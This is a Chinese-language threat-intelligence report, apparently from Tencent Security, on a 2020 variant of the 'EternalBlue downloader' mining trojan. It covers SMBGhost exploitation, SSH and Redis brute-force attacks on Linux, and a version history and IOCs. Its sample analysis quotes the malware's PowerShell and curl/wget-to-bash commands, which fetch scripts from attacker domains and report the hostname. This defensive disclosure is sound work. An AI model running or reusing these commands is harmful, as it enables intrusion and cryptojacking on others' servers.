【文章摘要】2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种,首次启用SMBGhost漏洞攻击。永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。中小微企业用户可使用腾讯电脑管家小团队版对永恒之蓝木马下载器相关病毒木马进行检测查杀,并实时检测团队设备运行状况。
一、背景
2020年6月10日,腾讯安全威胁情报中心检测到永恒之蓝下载器木马出现变种。此次变种在上个版本“黑球”行动中检测SMBGhost漏洞的基础上首次启用SMBGhost漏洞攻击,之前的若干种病毒只是利用SMBGhost漏洞做扫描检测,并无实质性攻击利用。本次更新还启用了SSH爆破以及新增Redis爆破能力攻击Linux系统。由于SMBGhost漏洞CVE-2020-0796利用Windows SMB漏洞远程攻击获取系统最高权限,可直接攻击SMB服务造成RCE(远程代码执行),存在漏洞的计算机只要联网就可能被黑客探测攻击,并获得系统最高权限。使得木马针对Windows系统的攻击威力再次增强。
此外永恒之蓝下载器木马还新增了针对Linux系统的远程攻击,在失陷系统创建定时任务并植入挖矿木马功能,使得其攻击的范围继续扩大,包括云上Linux主机等都可能成为攻击目标。永恒之蓝本次更新的主要目的是释放挖矿木马,并会按照惯例在开始挖矿前,清除其他挖矿木马,以便独占系统资源。挖矿活动会大量消耗企业服务器资源,使正常业务受严重影响。
腾讯安全系列安全产品已支持该病毒的检测和清除,腾讯安全威胁情报中心曾多次发布SMBGhost漏洞风险提示,至今仍有近三分之一的系统未修补该漏洞,我们再次强烈建议所有用户尽快修补SMBGhost漏洞(CVE-2020-0796)。
二、解决方案
永恒之蓝木马下载器利用多种流行的攻击方式,包括高危漏洞利用、爆破攻击、感染可移动设备、钓鱼邮件攻击,对企业用户危害严重。SMBGhost漏洞利用会导致完全控制企业服务器,可能造成严重信息泄露事件。中小微企业用户可使用腾讯电脑管家小团队版(https://team.qq.com/site/index.html),对永恒之蓝木马下载器相关病毒木马进行检测查杀,并实时检测团队设备运行状况。
腾讯电脑管家小团队版面向中小微企业,功能丰富且永久免费。企业只需注册并下载客户端,即可免费享受专业的终端安全管理服务,有效满足中小企业安全运维降本增效的诉求。
管理后台的首页概览可帮助管理员了解当前团队的总体设备安全状态、预警情况、资产管理,同时还展示了团队的网络资源使用情况和公告投放的进度。预警卡片将为管理员展示当前团队中有异常的设备数,预警的内容包括设备安全状态的预警、设备运行健康度的预警和硬件变更类的预警,实时检测团队设备安全。
三、样本分析
攻击模块if.bin在smbghost_exec函数中利用从hxxp://d.ackng.com/smgh.bin下载的SMBGhost漏洞攻击程序发起攻击,攻击成功后远程执行以下shellcode:
powershell IEx(New-Object Net.WebClient).DownLoadString(''http[:]///t.amynx.com/smgho.jsp?0.8*%computername%'')
发起针对Linux服务器的攻击:
1、 利用SSH爆破
扫描22端口进行探测,针对Linux系统root用户,尝试利用弱密码进行爆破连接,爆破登陆成功后执行远程命令:
Src=ssho;(curl -fsSL http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`||wget -q -O- http[:]//t.amynx.com/ln/core.png?0.8*ssho*`whoami`*`hostname`) | bash
2、 利用Redis未授权访问漏洞
扫描6379端口进行探测,在函数redisexec中尝试连接未设置密码的redis服务器,访问成功后执行远程命令:export src=rdso;curl -fsSL t.amynx.com/ln/core.png?rdso|bash
SSH爆破和Redis爆破登陆成功均会执行Linux Shell脚本core.png,该脚本主要有以下功能:
1、 创建crontab定时任务下载和执行脚本http[:]//t.amynx.com/ln/a.asp
2、 创建crontab定时启动Linux平台挖矿木马/.Xll/xr
通过定时任务执行的a.asp首先会清除竞品挖矿木马,然后通过获取/root/.sshown_hosts中记录的本机SSH登陆过的IP,重新与该机器建立连接进行内网扩散攻击:
创建目录/.Xll并下载挖矿木马(d[.]ackng.com/ln/xr.zip)到该目录下,解压得到xr并连接矿池lplp.ackng.com:444启动挖矿。
永恒之蓝下载器木马自2018年底诞生以来一直处于高度活跃状态,目前该木马会通过以下方法进行扩散传播:
漏洞利用 | 弱口令爆破 | 感染可移动设备 | 鱼叉攻击 |
“永恒之蓝”漏洞利用MS17-010 | $IPC爆破 | 通过U盘、网络共享盘 | 以新冠肺炎等多种主题 |
Lnk漏洞利用CVE-2017-8464 | SMB爆破 | 创建带漏洞lnk文件、js文件 | DOC漏洞文档、js文件诱饵 |
Office漏洞利用CVE-2017-8570 | MS SQL爆破 | ||
SMBGhost漏洞利用CVE-2020-0796 | RDP爆破 | ||
Redis未授权访问漏洞(针对Linux) | SSH爆破(针对Linux) |
截止2020年6月12日,永恒之蓝木马下载器家族主要版本更新功能列表如下:
2018年12月14日 | 利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 |
2018年12月19日 | 下载之后的木马新增Powershell后门安装。 |
2019年1月9日 | 检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 |
2019年1月24日 | 木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。 |
2019年1月25日 | 木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。 |
2019年2月10日 | 将攻击模块打包方式改为Pyinstaller。 |
2019年2月20日 | 更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 |
2019年2月23日 | 攻击方法再次更新,新增MsSQL爆破攻击。 |
2019年2月25日 | 在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 |
2019年3月6日 | 通过已感染机器后门更新Powershell脚本横向传播模块ipc。 |
2019年3月8日 | 通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 |
2019年3月14日 | 通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 |
2019年3月28日 | 更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 |
2019年4月3日 | 开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。 |
2019年7月19日 | 无文件攻击方法新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘,新增MsSQL爆破攻击。 |
2019年10月9日 | 新增Bluekeep漏洞CVE-2019-0708检测上报功能。 |
2020年2月12日 | 使用DGA域名,篡改hosts文件。 |
2020年4月3日 | 新增钓鱼邮件传播,邮件附件urgent.doc包含Office漏洞CVE-2017-8570。 |
2020年4月17日 | 钓鱼邮件新增附件readme.zip、readme.doc,新增Bypass UAC模块7p.php,创建readme.js文件感染可移动盘、网络共享盘 |
2020年5月21日 | 新增SMBGhost漏洞CVE-2020-0796检测上报功能,新增SSH爆破代码(未调用)。 |
2020年6月10日 | 新增SMBGhost漏洞CVE-2020-0796利用攻击,新增SSH爆破、Redis爆破攻击Linux服务器并植入Linux平台挖矿木马。 |
IOCs
Domain
t.amynx.com
t.zer9g.com
t.zz3r0.com
d.ackng.com
URL
http[:]//t.amynx.com/smgh.jsp
http[:]//t.amynx.com/a.jsp
http[:]//t.amynx.com/ln/a.asp
http[:]//t.amynx.com/ln/core.png
http[:]//d.ackng.com/if.bin
http[:]//d.ackng.com/smgh.bin
http[:]//d.ackng.com/ln/xr.zip
Md5
if.bin | 99ecca08236f6cf766d7d8e2cc34eff6 |
xr.zip | 2977084f9ce3e9e2d356adaf2b5bdcfd |
core.png | 17703523f5137bc0755a7e4f133fc9d3 |
a.asp | 8b0cb7a0760e022564465e50ce3271bb |
smgh.bin | 5b3c44b503c7e592e416f68d3924620f |
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...